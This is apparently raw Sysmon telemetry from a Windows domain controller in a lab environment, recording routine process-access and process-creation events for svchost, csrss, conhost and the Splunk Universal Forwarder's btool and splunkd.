13:55:53.870{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007235Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:53.870{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007234Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:53.870{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007233Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:53.870{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007232Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:53.870{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007231Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:53.870{10ACEC4A-853E-5FCF-0500-000000009101}644792C:\Windows\system32\csrss.exe{10ACEC4A-85E9-5FCF-2901-000000009101}4428C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007230Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:53.855{10ACEC4A-85E9-5FCF-2801-000000009101}44563868C:\Windows\system32\cmd.exe{10ACEC4A-85E9-5FCF-2901-000000009101}4428C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000007229Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:53.870{10ACEC4A-85E9-5FCF-2901-000000009101}4428C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exebtool server list kvstore --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{10ACEC4A-85E9-5FCF-2801-000000009101}4456C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c btool server list kvstore --no-log 10341000x80000000000000007228Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:53.855{10ACEC4A-85E9-5FCF-1F01-000000009101}31363920C:\Windows\system32\conhost.exe{10ACEC4A-85E9-5FCF-2801-000000009101}4456C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007227Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:53.855{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007226Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:53.855{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007225Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:53.855{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007224Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:53.855{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007223Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:53.855{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007222Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:53.855{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007221Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:53.855{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007220Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:53.855{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007219Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:53.855{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007218Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:53.855{10ACEC4A-853E-5FCF-0500-000000009101}644660C:\Windows\system32\csrss.exe{10ACEC4A-85E9-5FCF-2801-000000009101}4456C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007217Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:53.855{10ACEC4A-85E9-5FCF-2101-000000009101}43521168C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe{10ACEC4A-85E9-5FCF-2801-000000009101}4456C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+43bc6|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+6665|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+14ab4|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+d1d8|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000007216Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:53.865{10ACEC4A-85E9-5FCF-2801-000000009101}4456C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c btool server list kvstore --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{10ACEC4A-85E9-5FCF-2101-000000009101}4352C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal_extra_splunkd_service_args 10341000x80000000000000007215Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:53.839{10ACEC4A-85E9-5FCF-2701-000000009101}47923376C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE{10ACEC4A-85E9-5FCF-1B01-000000009101}1840C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e675|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f344c|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007214Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:53.589{10ACEC4A-85E9-5FCF-1F01-000000009101}31363920C:\Windows\system32\conhost.exe{10ACEC4A-85E9-5FCF-2701-000000009101}4792C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007213Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:53.589{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007212Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:53.589{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007211Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:53.589{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007210Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:53.589{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007209Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 